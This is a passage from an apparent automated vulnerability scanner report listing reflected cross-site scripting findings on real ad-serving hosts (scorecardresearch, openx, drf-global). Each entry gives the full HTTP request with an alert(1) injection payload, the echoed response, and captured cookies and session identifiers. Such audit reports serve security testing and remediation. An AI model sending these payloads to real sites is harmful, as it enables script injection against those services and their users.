ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"1371e<script>alert(1)</script>3fbe42d830d", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.43. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d5d70<script>alert(1)</script>e85dc046e5c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=d5d70<script>alert(1)</script>e85dc046e5c&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"d5d70<script>alert(1)</script>e85dc046e5c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



4.44. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 24b3b<script>alert(1)</script>279d6872fb9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=24b3b<script>alert(1)</script>279d6872fb9&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:52 GMT
Date: Sun, 02 Oct 2011 23:52:52 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"24b3b<script>alert(1)</script>279d6872fb9", c6:"", c10:"", c15:"", c16:"", r:""});



4.45. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6e3ec<script>alert(1)</script>d0298376d15 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=6e3ec<script>alert(1)</script>d0298376d15&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 23:52:53 GMT
Date: Sun, 02 Oct 2011 23:52:53 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"6e3ec<script>alert(1)</script>d0298376d15", c10:"", c15:"", c16:"", r:""});



4.46. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload a5007<script>alert(1)</script>25b039ed36e was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_23202976328a5007<script>alert(1)</script>25b039ed36e&pid=c8eddb4a-d9d5-0c5b-6e12-562295aa26ea&s=728x90&f=1.3&url=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news&cid=oxpv1%3A34-632-1929-2254-6393&hrid=77e73cd01694ae3edcb772febdf4acd1-1317599425 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1317129774; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

OXM_23202976328a5007<script>alert(1)</script>25b039ed36e({"r":null});

4.47. http://d.tradex.openx.com/afr.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca534</script><script>alert(1)</script>a6853b22006 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:54:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:54:23 GMT; path=/
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HEREca534</script><script>alert(1)</script>a6853b22006&loc=")', 40000);
// ]]>
...[SNIP]...

4.48. http://d.tradex.openx.com/afr.php [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55a13</script><script>alert(1)</script>3f8ba84e66c was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; __csref=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:57:23 GMT; path=/
Content-Length: 3019
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=55a13</script><script>alert(1)</script>3f8ba84e66c")', 40000);
// ]]>
...[SNIP]...

4.49. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5849</script><script>alert(1)</script>2ba89ba78d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:55:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%27; expires=Mon, 01-Oct-2012 23:55:30 GMT; path=/
Content-Length: 2795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&c5849</script><script>alert(1)</script>2ba89ba78d=1&loc=")', 40000);
// ]]>
...[SNIP]...

4.50. http://d.tradex.openx.com/afr.php [zoneid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 713c9</script><script>alert(1)</script>3b14e1cb0e2 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%5D%5D%3E%3E; expires=Mon, 01-Oct-2012 23:53:21 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511713c9</script><script>alert(1)</script>3b14e1cb0e2&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 40000);
// ]]>
...[SNIP]...

4.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4765"%3balert(1)//842209825e9 was submitted in the mid parameter. This input was echoed as a4765";alert(1)//842209825e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1a4765"%3balert(1)//842209825e9&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:04 GMT
Server: Apache
Set-Cookie: JSESSIONID=9AE5B1EE946FD6F0C0A430487526B06D.p0529; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.63
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4620

function Miwe1a4765";alert(1)//842209825e9() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/cl
...[SNIP]...
       },
       search: {
           type: "JS_OBJECT",
           uid: "9484261c-5e39-4ffd-a8b2-5f3e43a6e87f"
       }
   }
}
Miwe1a4765";alert(1)//842209825e9.prototype.getParts = function() {
return this.parts;
}
Miwe1a4765";alert(1)//842209825e9.prototype.getPart = function(id) {
return this.parts[id];
}
window["miwe1a4765";alert(1)//842209825e9"] = new Miwe1a4765";alert(1)//842209825e9();


4.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The value of the mid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7d70%3balert(1)//b2842205c0b was submitted in the mid parameter. This input was echoed as e7d70;alert(1)//b2842205c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=1e7d70%3balert(1)//b2842205c0b&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:05 GMT
Server: Apache
Set-Cookie: JSESSIONID=F5E192AC799744E1978CC2777215B349.p0523; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.57
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4615

function Miwe1e7d70;alert(1)//b2842205c0b() {
   this.parts = {
       insertions: {
           type: "JS_OBJECT",
           list: {
orbitz: {
"key": "orbitz",
"txt": "Orbitz",
"lnk": "http://ad.doubleclick.net/clk;141652382;20702477;a?http://www.orbitz.co
...[SNIP]...

4.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ffe58%3balert(1)//d4209f9fb72 was submitted in the mid parameter. This input was echoed as ffe58;alert(1)//d4209f9fb72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=0ffe58%3balert(1)//d4209f9fb72&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=DC3EB887B493EAE1352D240AB8EE0CBC.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5159

function Miwe0ffe58;alert(1)//d4209f9fb72() {
   this.parts = {
       content: {
           type: "HTML",
           data: DrfEncoder.decode("DQoNCjxkaXYgaWQ9ImRyZl9wb3B1bmRlckhQVSI+DQoJPGRpdiBjbGFzcz0id2lkZ2V0SGVhZGVyIj4NCgkJPHA+RmluZCBDaGVhcDwvcD4NCgkJPHA+SG
...[SNIP]...

4.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98c61"%3balert(1)//bb08c81a782 was submitted in the mid parameter. This input was echoed as 98c61";alert(1)//bb08c81a782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf?mid=098c61"%3balert(1)//bb08c81a782&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&travelers=1&destination=BOS&dateDisplayFormat=mm/dd/yyyy&departureDate=yyyymmdd& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=8F129309865236AA29C043EFCB3D41D2.p0524; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.58
Cache-Control: must-revalidate
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 5164

function Miwe098c61";alert(1)//bb08c81a782() {
   this.parts = {
       content: {
